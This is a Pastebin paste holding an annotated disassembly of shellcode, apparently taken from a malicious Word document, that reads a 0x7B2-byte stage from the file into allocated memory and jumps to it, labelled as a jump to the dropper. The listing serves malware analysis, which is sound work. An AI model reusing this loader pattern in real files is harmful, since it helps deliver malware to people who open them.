API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 28th, 2015
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 1.09 KB | None | 0 0
raw download clone embed print report diff
  1. debug016:00350157 loc_350157:                             ; CODE XREF: debug016:0035014Aj
  2. debug016:00350157 push    0
  3. debug016:00350159 push    0
  4. debug016:0035015B push    dword ptr [ebp-18h]
  5. debug016:0035015E push    dword ptr [ebp-4]
  6. debug016:00350161 call    dword ptr [ebp-40h]             ; call SetFilePointer
  7. debug016:00350164 push    dword ptr [ebp-14h]
  8. debug016:00350167 push    40h
  9. debug016:00350169 call    dword ptr [ebp-34h]             ; call GlobalAlloc
  10. debug016:0035016C mov     [ebp-0Ch], eax                  ; Allocate 7B2 bytes
  11. debug016:0035016F push    0
  12. debug016:00350171 lea     eax, [ebp-1Ch]
  13. debug016:00350174 push    eax
  14. debug016:00350175 push    dword ptr [ebp-14h]             ; size=0x7B2
  15. debug016:00350178 push    dword ptr [ebp-0Ch]             ; Buffer
  16. debug016:0035017B push    dword ptr [ebp-4]               ; hFile
  17. debug016:0035017E call    dword ptr [ebp-3Ch]             ; call ReadFile
  18. debug016:00350181 mov     eax, [ebp-0Ch]
  19. debug016:00350184
  20. debug016:00350184 JMP_To_Dropper_:                        ; Jump to dropper in .DOC
  21. debug016:00350184 jmp     eax
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!